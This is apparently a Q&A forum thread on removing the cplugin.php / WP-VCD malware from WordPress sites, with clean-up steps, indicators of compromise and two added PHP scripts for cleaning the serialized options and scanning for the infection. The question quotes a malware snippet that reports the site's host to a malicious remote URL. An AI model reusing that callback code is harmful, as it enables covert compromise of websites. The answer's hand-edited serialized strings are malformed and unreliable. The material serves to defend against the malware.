
There is a recent attack where numerous WordPress websites are taken down due to a file cplugin.php, which is malware.

The malware is badly written code, so for now it is mostly causing a 500 server runtime error. But it's better to delete it immediately, as it migrates to all the other websites on the server and has code to hit a malware URL to download additional files. A snippet of the malware code:

    if (get_option('log_install') !== '1') {
        // Not yet registered with the operator: report this host to the remote URL,
        // falling back to the malware's own HTTP helper if file_get_contents() is blocked.
        if (!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"])) {
            $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"]);
        }
    }

I have figured out a solution and am posting the answer myself to help all users out there.

Edit:

There are reports of the same file being named differently for users: ccode.php, cplugin.php and helad.php, in which case the fix can be modified.

Mustafa sabir

5 Answers


This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downtime. Deleting the file is of no use, as it re-appears. Also, it will infect all other sites on a multi-website server. Fortunately, after working for hours, I have figured out the fix. Please read this carefully to fix your site:

  1. Back up your database and files.

  2. Edit your wp_options table, find the property active_plugins and edit it; you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Edit this to remove the cplugin.php entry: start from the i up to the next ; and remove that. (Make sure your database is backed up in case you make a mistake.) The new entry without the cplugin.php will look like:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

  3. Follow this step similarly for the field in the wp_options table named site_transient_update_plugins.

before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

  4. After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php.

  5. Log in to your WordPress dashboard and re-activate all your plugins.

Voila, you have fixed your website.

I think the technical reason for this would be that the malware registers itself as a WordPress plugin, which automatically replaces the file upon deletion. Fortunately the malware is badly written code, so instead of running it mostly throws a 500 error. But in any case I would recommend deleting it immediately in case it updates.

Edit: According to the WordPress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in WordPress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in any case, so I would recommend the first solution at least after gaining access to the site.

Mustafa sabir
  • Thanks for this, I did some changes to the database and it broke my site - hopefully it comes back up ok when I import the old backup I have :) – Naveen DINUSHKA Aug 29 '20 at 02:43
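Hand-editing PHP serialized strings is error-prone: the edited values in the answer above keep the a:16 element count and a dangling i:2; key, so unserialize() rejects them, WordPress sees an empty active_plugins list and every plugin is deactivated, which is why the last step has you reactivate them all. The script below, an added example rather than code from the question or the answer, does the same clean-up by unserializing the option, filtering the entries and re-serializing, so the counts and keys stay consistent. The sample option values are constructed for the demonstration; the list of malware file names is assumed from the answers on this page and can be extended. Requires PHP 7.4 or later.

```php
<?php
// Added example, not code from the question or the answer above: strip the
// cplugin.php entries out of the serialized WordPress options programmatically
// instead of hand-editing the serialized strings. The sample option values
// below are constructed for this demonstration; on a live site read the values
// with get_option() / WP-CLI, clean them, and write them back the same way.

// Plugin files the answers on this page name as the malware (assumed complete
// for this example; extend the list if your install shows another name).
const MALWARE_PLUGIN_FILES = ['ccode.php', 'cplugin.php', 'helad.php', 'mplugin.php'];

/**
 * Remove the malware entries from a serialized active_plugins value and
 * re-serialize it with renumbered keys, so the a:N count and the i:N keys
 * stay consistent and WordPress can still unserialize the result.
 */
function clean_active_plugins(string $serialized): string
{
    $plugins = @unserialize($serialized, ['allowed_classes' => false]);
    if (!is_array($plugins)) {
        throw new RuntimeException('active_plugins is not a serialized array');
    }
    $kept = array_values(array_filter(
        $plugins,
        fn($file) => !in_array($file, MALWARE_PLUGIN_FILES, true)
    ));
    return serialize($kept);
}

/**
 * Remove the malware entries from a serialized site_transient_update_plugins
 * value. The transient is a stdClass whose checked/response/no_update arrays
 * are keyed by plugin file name, so the offending keys are simply unset.
 */
function clean_update_transient(string $serialized): string
{
    $transient = @unserialize($serialized, ['allowed_classes' => ['stdClass']]);
    if (!$transient instanceof stdClass) {
        throw new RuntimeException('site_transient_update_plugins is not a serialized stdClass');
    }
    foreach (['checked', 'response', 'no_update'] as $prop) {
        if (isset($transient->{$prop}) && is_array($transient->{$prop})) {
            foreach (MALWARE_PLUGIN_FILES as $bad) {
                unset($transient->{$prop}[$bad]);
            }
        }
    }
    return serialize($transient);
}

/** True when the value unserializes to an array, i.e. WordPress will accept it. */
function is_valid_plugin_list(string $serialized): bool
{
    return is_array(@unserialize($serialized, ['allowed_classes' => false]));
}

// Constructed sample values shaped like the ones shown in the answer.
$sampleActive = serialize([
    'carousel-anything/index.php',
    'contact-form-7/wp-contact-form-7.php',
    'cplugin.php',
    'duplicate-page/duplicatepage.php',
]);
$sampleTransient = serialize((object) [
    'last_checked' => 1598414385,
    'checked'      => [
        'carousel-anything/index.php'          => '2.0',
        'contact-form-7/wp-contact-form-7.php' => '5.2',
        'cplugin.php'                          => '1.0',
    ],
    'response'  => [],
    'no_update' => [],
]);

echo "active_plugins:                  ", clean_active_plugins($sampleActive), PHP_EOL;
echo "site_transient_update_plugins:   ", clean_update_transient($sampleTransient), PHP_EOL;
echo "cleaned list still unserializes: ",
    is_valid_plugin_list(clean_active_plugins($sampleActive)) ? 'yes' : 'no', PHP_EOL;
```

The two clean_* functions take and return the raw strings as they appear in phpMyAdmin, so their output can be pasted straight into the option_value column; from inside WordPress or WP-CLI you would instead pass the unserialized array to update_option() and let WordPress serialize it. Because the list is rebuilt rather than spliced, a clean run leaves the other plugins active and no reactivation step is needed.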

This is not an attack, but malware included with a nulled plugin or theme you downloaded and installed yourself. It is an updated version of WP-VCD - WordFence has a whitepaper with all the details about that in WP-VCD: The Malware You Installed On Your Own Site; perhaps we should call it "WP-VCD Reloaded" :)

Indicators of Compromise are plugin files named ccode.php, cplugin.php, helad.php, and mplugin.php (and admin_ips.txt) in wp-content/plugins, and plugins / themes with the file class.plugin-modules.php or class.theme-modules.php somewhere in their folder.

Cleaning up

  1. Find the plugin or theme with the malware in class.plugin-modules.php or class.theme-modules.php and delete the plugin or theme (if you need it, purchase it from the official source).
  2. Delete the malware plugin(s): ccode.php, cplugin.php, helad.php or mplugin.php.
  3. Repeat this for all sites under the same hosting account / server.

The installation procedure does seem to touch wp-includes/functions.php, but it only tries to remove malware, so this is perhaps part of some upgrade from a previous malware version.

petskratt
  • Yes, but if you read the WordPress forums, people have experienced it since last week mostly. Maybe they recently updated the malware and re-released it, so calling it an attack would not be wrong :) Also some of my clients who had no nulled theme or plugin installed had the problem. It was a single-website server with a genuine purchased and updated theme and plugins, and the latest WordPress version. I personally also never use nulled themes/plugins. I think this is something else.... need to dig deeper. – Mustafa sabir Aug 30 '20 at 19:28
  • WordPress forum posts are related to an apparent bug in the malware - cplugin.php tries to update itself on each run, so there was buggy code on the C2 (command & control) servers that was presumably distributed a week ago to sites that already had the malware installed, and they started throwing errors. I have been tracking this nulled-themes group for some years, so I have dug pretty deep. I work for a hosting provider and, despite hundreds of infections, have still not found a case that is not traceable to a nulled theme. – petskratt Aug 31 '20 at 06:18

There was no entry in the db on our sites, but the call code was added to the bottom of functions.php in the wp-includes folder. Removing the offending call, and the sites popped right up. :)

mark
  • Thanks for the input. Are you sure it was the cplugin attack? Because WordPress has many other types of malware too. Usually most of them show similar behaviour of making calls to some malicious website to download files and scripts or for forced redirection. In any case, I would recommend a strict file permissions setup and the Wordfence security plugin for better safety. – Mustafa sabir Aug 27 '20 at 09:15
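The indicators in petskratt's answer (the named files in wp-content/plugins, and class.plugin-modules.php / class.theme-modules.php inside a nulled package) and mark's report of the callback appended to wp-includes/functions.php can be checked with one scan, repeated over every site on the server as the third clean-up step asks. The script below is an added example, not code from either answer or from WordFence; the default install path is an assumption, and the strings it looks for in functions.php come from the malware snippet in the question.

```php
<?php
// Added example, not code from petskratt's or mark's answer: scan one or more
// WordPress installs for the indicators of compromise those answers list.
// Usage: php scan_wpvcd.php /var/www/site1 /var/www/site2 ...
// The default root below is an assumed path used only when no argument is given.

// Files that sit directly in wp-content/plugins when the malware plugin is installed.
const IOC_PLUGIN_FILES = ['ccode.php', 'cplugin.php', 'helad.php', 'mplugin.php', 'admin_ips.txt'];
// Files found somewhere inside the nulled plugin or theme that carried the malware.
const IOC_MODULE_FILES = ['class.plugin-modules.php', 'class.theme-modules.php'];
// Strings taken from the malware snippet in the question, checked in
// wp-includes/functions.php (mark's answer found the callback appended there).
const IOC_CORE_STRINGS = ['romndo.com', 'file_get_contents_cplugin', "get_option('log_install')"];

/**
 * Return a list of human-readable findings for one WordPress root.
 * Each module-file finding names the plugin/theme package to remove, not just
 * the file, because deleting the dropper alone leaves the infected package in place.
 */
function scan_wordpress(string $root): array
{
    $findings = [];
    $root = rtrim($root, '/');

    // 1. Malware plugin files directly under wp-content/plugins.
    $pluginsDir = "$root/wp-content/plugins";
    foreach (IOC_PLUGIN_FILES as $name) {
        if (is_file("$pluginsDir/$name")) {
            $findings[] = "malware plugin file: $pluginsDir/$name";
        }
    }

    // 2. Dropper files anywhere inside a plugin or theme folder.
    foreach (['plugins', 'themes'] as $kind) {
        $dir = "$root/wp-content/$kind";
        if (!is_dir($dir)) {
            continue;
        }
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
        );
        foreach ($iterator as $file) {
            if (!in_array($file->getFilename(), IOC_MODULE_FILES, true)) {
                continue;
            }
            // First path segment below wp-content/<kind>/ is the infected package.
            $relative = substr($file->getPathname(), strlen($dir) + 1);
            $package  = explode('/', $relative, 2)[0];
            $findings[] = "infected $kind package '$package': " . $file->getPathname();
        }
    }

    // 3. Callback code appended to the core file wp-includes/functions.php.
    $functions = "$root/wp-includes/functions.php";
    if (is_file($functions)) {
        $source = (string) file_get_contents($functions);
        foreach (IOC_CORE_STRINGS as $needle) {
            if (strpos($source, $needle) !== false) {
                $findings[] = "core file contains '$needle': $functions";
            }
        }
    }
    return $findings;
}

// Repeat for every site on the server (step 3 of the answer): one root per argument.
$roots = array_slice($argv ?? [], 1) ?: ['/var/www/example/htdocs'];
$total = 0;
foreach ($roots as $root) {
    $findings = scan_wordpress($root);
    $total += count($findings);
    echo "== $root: " . count($findings) . " finding(s)" . PHP_EOL;
    foreach ($findings as $finding) {
        echo "  $finding" . PHP_EOL;
    }
}
// Non-zero exit makes the scan usable from cron or a hosting-wide job.
exit($total > 0 ? 1 : 0);
```

String matching on functions.php only catches the variant quoted in the question; for core files in general, comparing against the published checksums (WP-CLI's wp core verify-checksums) tells you whether any core file has been altered, whatever was appended. A hit on the package name is the actionable result: remove that plugin or theme entirely and reinstall it from the official source, as the answer says.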

In the wp-content folder there is a file called cplugin.php or helad.php, in which case the fix can be modified. Delete it immediately, as it migrates to all the other websites on the server and has code to hit a malware URL to download additional files.

Ravinder

You used a nulled theme or plugin.